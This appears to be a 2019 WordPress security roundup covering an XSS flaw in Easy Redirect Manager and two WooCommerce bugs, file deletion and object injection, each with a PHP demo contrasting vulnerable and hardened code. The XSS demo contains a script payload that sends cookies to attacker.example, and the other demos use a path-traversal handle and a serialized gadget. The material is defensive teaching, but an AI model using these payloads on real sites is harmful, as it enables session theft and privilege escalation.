WordPress Vulnerabilities 19.01.22

January 28th is Data Privacy Day!

Data Privacy Day (DPD) will be held on January 28th, 2019. It is an annual effort to promote data privacy awareness and education. DPD 2019 is sponsored by the National Cyber Security Alliance (NCSA) and is built around the theme, A New Era in Privacy.

The NCSA Stay Safe Online website will feature a live stream of the Data Privacy Day 2019 – Live From LinkedIn event, with presentations on the opportunities, challenges and future of privacy. The event will also feature a TED-style talk with a global principal security architect from Amazon Web Services (AWS).

The National Cybersecurity and Communications Integration Center (NCCIC) is part of the Cybersecurity and Infrastructure Security Agency (CISA). NCCIC encourages all users and administrators to review the NCSA's tips on Managing Your Privacy, available at the link below, and the following NCCIC tips:

https://staysafeonline.org/


There were three new WordPress vulnerabilities to report this week according to US-CERT. All three live in plugins rather than WordPress core, so the usual advice applies: always keep your plugins and themes up to date, and remove plugins that are no longer maintained.

Premium WP Suite Easy Redirect Manager

The Premium WP Suite Easy Redirect Manager plugin 2.18.18 for WordPress is vulnerable to cross-site scripting (XSS): a crafted GET request is mishandled while viewing the redirect log at the templates/admin/redirect-log.php URI. Because the payload travels in a GET request to an admin page, an administrator only has to follow a crafted link while logged in for the script to run in their session. Unfortunately, there are no plans to support this plugin, so you should migrate to another solution as quickly as possible. The plugin is no longer available in the WordPress plugin repository.
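The bug class above, as an added illustration that is not the Easy Redirect Manager plugin's own code: a log-viewing page that reflects a request parameter (here a hypothetical `filter` parameter) and stored log fields into HTML without escaping, beside the hardened version. The log entries and the attack string are constructed for the demo. Inside a real plugin the escaping would be done with WordPress's `esc_html()` / `esc_attr()`; `htmlspecialchars()` is used here so the file runs stand-alone under the PHP CLI.

```php
<?php
// Illustrative example of reflected XSS in a log viewer; not code from the plugin.
declare(strict_types=1);

// Constructed sample redirect log (hypothetical data).
$log = [
    ['from' => '/old-page', 'to' => '/new-page',  'hits' => 12],
    ['from' => '/promo',    'to' => '/shop/sale', 'hits' => 3],
];

// Vulnerable: the "filter" query parameter and the stored fields are
// written into the page verbatim.
function render_log_vulnerable(array $log, array $get): string
{
    $filter = $get['filter'] ?? '';
    $html   = "<p>Showing redirects matching: {$filter}</p>\n<table>\n";
    foreach ($log as $row) {
        if ($filter !== '' && strpos($row['from'], $filter) === false) {
            continue;
        }
        $html .= "<tr><td>{$row['from']}</td><td>{$row['to']}</td><td>{$row['hits']}</td></tr>\n";
    }
    return $html . "</table>\n";
}

// Stand-in for esc_html(): encode every character that can open a tag or attribute.
function esc_out(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Hardened: every untrusted value is escaped at output time. The stored
// fields are escaped too, because a redirect target may have been written by
// a lower-privileged user and is just as untrusted as the request parameter.
function render_log_safe(array $log, array $get): string
{
    $filter = substr((string) ($get['filter'] ?? ''), 0, 200);   // also cap the length
    $html   = '<p>Showing redirects matching: ' . esc_out($filter) . "</p>\n<table>\n";
    foreach ($log as $row) {
        if ($filter !== '' && strpos($row['from'], $filter) === false) {
            continue;
        }
        $html .= '<tr><td>' . esc_out($row['from']) . '</td><td>' . esc_out($row['to'])
               . '</td><td>' . (int) $row['hits'] . "</td></tr>\n";
    }
    return $html . "</table>\n";
}

// Constructed attack: the victim admin follows a link such as
// .../redirect-log.php?filter=%22%3E%3Cscript%3E... (decoded below).
$get = ['filter' => '"><script>document.location="https://attacker.example/?c="+document.cookie</script>'];

echo "--- vulnerable ---\n", render_log_vulnerable($log, $get);
echo "--- hardened ---\n",  render_log_safe($log, $get);
```

Run with `php example.php`: the vulnerable output contains the `<script>` element intact, while the hardened output renders it as `&lt;script&gt;...` text that the browser never executes. The filter value is escaped even though no log row matches it, which is exactly the reflected case: the attacker needs no stored data at all, only a link the administrator will click.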

WooCommerce prior to 3.4.6

The logging system of the Automattic WooCommerce plugin before 3.4.6 for WordPress has an arbitrary file deletion vulnerability. A shop manager can use it to delete woocommerce.php, the plugin's main file. WordPress then no longer loads the plugin, so the capability restrictions WooCommerce places on the shop manager role are no longer in effect, and the shop manager can escalate privileges to administrator. The general lesson is that deleting a plugin's main file is as good as deactivating it: any privilege check a plugin adds on top of WordPress core disappears with it, so file deletion bugs in an admin context should be rated as privilege escalation, not as a nuisance.
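The deletion half of the bug, as an added example that is not WooCommerce's code: an admin "delete log" action that builds a filesystem path from a request-controlled log handle. The vulnerable version concatenates the handle and lets a `../` sequence escape the log directory; the hardened version validates the handle, resolves the path with `realpath()` and refuses anything outside the log directory. The directory layout, file names and the `../plugins/woocommerce/woocommerce.php` handle are constructed for the demo, with a temporary directory standing in for wp-content.

```php
<?php
// Illustrative example of path traversal in a log-deletion handler; not WooCommerce's code.
declare(strict_types=1);

// Constructed layout under a temp dir: <base>/wc-logs holds the logs,
// <base>/plugins/woocommerce/woocommerce.php stands in for the plugin's main file.
$base   = sys_get_temp_dir() . '/logdemo-' . getmypid();
$logDir = $base . '/wc-logs';
$plugin = $base . '/plugins/woocommerce/woocommerce.php';
mkdir($logDir, 0700, true);
mkdir(dirname($plugin), 0700, true);
file_put_contents($logDir . '/payment-2019-01-19.log', "sample log line\n");
file_put_contents($plugin, "<?php // plugin bootstrap\n");

// Vulnerable: the handle is trusted and concatenated onto the log directory.
function remove_log_vulnerable(string $logDir, string $handle): bool
{
    $file = $logDir . '/' . $handle;
    return is_file($file) && unlink($file);
}

// Hardened: allow-list the handle's shape, canonicalise the path, and require
// the result to sit inside the log directory before touching the filesystem.
function remove_log_safe(string $logDir, string $handle): bool
{
    if (preg_match('/^[A-Za-z0-9_.-]+\.log$/', $handle) !== 1 || strpos($handle, '..') !== false) {
        return false;                                 // no slashes, no traversal, .log only
    }
    $root = realpath($logDir);
    $file = realpath($logDir . '/' . $handle);
    if ($root === false || $file === false) {
        return false;                                 // directory or file does not exist
    }
    if (strncmp($file, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return false;                                 // resolved path left the log directory
    }
    return is_file($file) && unlink($file);
}

// Attacker-controlled handle (constructed): climbs from the log directory to
// the plugin's main file. Once that file is gone WordPress stops loading the
// plugin, and every capability filter the plugin registered goes with it.
$evil = '../plugins/woocommerce/woocommerce.php';

var_dump(remove_log_safe($logDir, $evil));                     // refused
var_dump(file_exists($plugin));                                // plugin file still present
var_dump(remove_log_safe($logDir, 'payment-2019-01-19.log'));  // legitimate deletion allowed
var_dump(remove_log_vulnerable($logDir, $evil));               // traversal succeeds
var_dump(file_exists($plugin));                                // plugin file gone

// Clean up the temp layout.
@unlink($plugin);
@rmdir(dirname($plugin));
@rmdir(dirname($plugin, 2));
@rmdir($logDir);
@rmdir($base);
```

The hardened version returns false for the traversal handle and leaves woocommerce.php in place, while still deleting the real log; the vulnerable version removes the plugin file. The `realpath()` check matters even with the regex in front of it: symlinks inside the log directory would otherwise let a name that looks clean resolve somewhere else.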

WooCommerce prior to 3.2.4

In the Automattic WooCommerce plugin before 3.2.4 for WordPress, an attacker who already has access to the target site with a user account that has at least Shop manager privileges can supply a specially crafted string that results in PHP object injection. The sink is the use of cached queries within shortcodes in WC_Shortcode_Products::get_products() in includes/shortcodes/class-wc-shortcode-products.php. Object injection on its own only instantiates a class of the attacker's choosing; what it leads to depends on which classes with magic methods (__wakeup, __destruct, __toString) are loaded on the site, and a typical WordPress install with several plugins usually offers some.
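The bug class above, as an added example that is not WooCommerce's code: query results cached as a serialized string and later restored with `unserialize()`. If any part of the cached string is attacker-influenced, a serialized object of a class with a magic method becomes a gadget. The `LogBuffer` class, the in-memory "transient" store and the payload are constructed for this demo; a real WordPress transient behaves the same way because `maybe_unserialize()` calls `unserialize()` on stored arrays and objects.

```php
<?php
// Illustrative example of PHP object injection through a serialized cache; not WooCommerce's code.
declare(strict_types=1);

// A harmless-looking class that happens to be loaded on the site: on
// destruction it flushes a buffer to a file. That alone makes it a gadget.
class LogBuffer
{
    public $path = '';
    public $data = '';

    public function __destruct()
    {
        if ($this->path !== '') {
            file_put_contents($this->path, $this->data);
        }
    }
}

// Minimal stand-in for a transient store: values are kept serialized.
$cache = [];

function cache_set(array &$cache, string $key, $value): void
{
    $cache[$key] = serialize($value);
}

// Vulnerable: instantiates whatever class the stored string names.
function cache_get_vulnerable(array $cache, string $key)
{
    return isset($cache[$key]) ? unserialize($cache[$key]) : null;
}

// Hardened: only scalars and arrays come back. Any object in the payload is
// restored as __PHP_Incomplete_Class, whose magic methods never run. Caching
// JSON or plain product IDs instead would avoid interpreting class names at all.
function cache_get_safe(array $cache, string $key)
{
    if (!isset($cache[$key])) {
        return null;
    }
    $value = unserialize($cache[$key], ['allowed_classes' => false]);   // PHP 7.0+
    return $value === false ? null : $value;   // note: a cached literal false is also dropped
}

// Normal use: cache the IDs a product query returned.
cache_set($cache, 'products_q1', ['ids' => [101, 102, 103]]);

// Constructed attack: the attacker gets a serialized LogBuffer into the cache
// (in the real bug, through data a shop manager controls).
$target = sys_get_temp_dir() . '/object-injection-demo-' . getmypid() . '.txt';
$gadget = new LogBuffer();
$gadget->path = $target;
$gadget->data = "written by a deserialised gadget\n";
$cache['products_q2'] = serialize($gadget);
$gadget->path = '';   // disarm the original instance; only the cached copy matters from here

$safe = cache_get_safe($cache, 'products_q2');
echo 'hardened read restored: ', get_class($safe), "\n";
echo file_exists($target) ? "file written\n" : "no file written\n";

$unsafe = cache_get_vulnerable($cache, 'products_q2');
unset($unsafe);                         // the gadget's destructor runs here
echo file_exists($target) ? "file written\n" : "no file written\n";
@unlink($target);
```

With the hardened reader the object comes back as `__PHP_Incomplete_Class` and no file is written; with the vulnerable reader the `LogBuffer` destructor fires as soon as the object goes out of scope and writes the file. Note that the dangerous step is the deserialisation itself, not any later use of the value, which is why sanitising the cached data after `unserialize()` cannot fix this class of bug.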
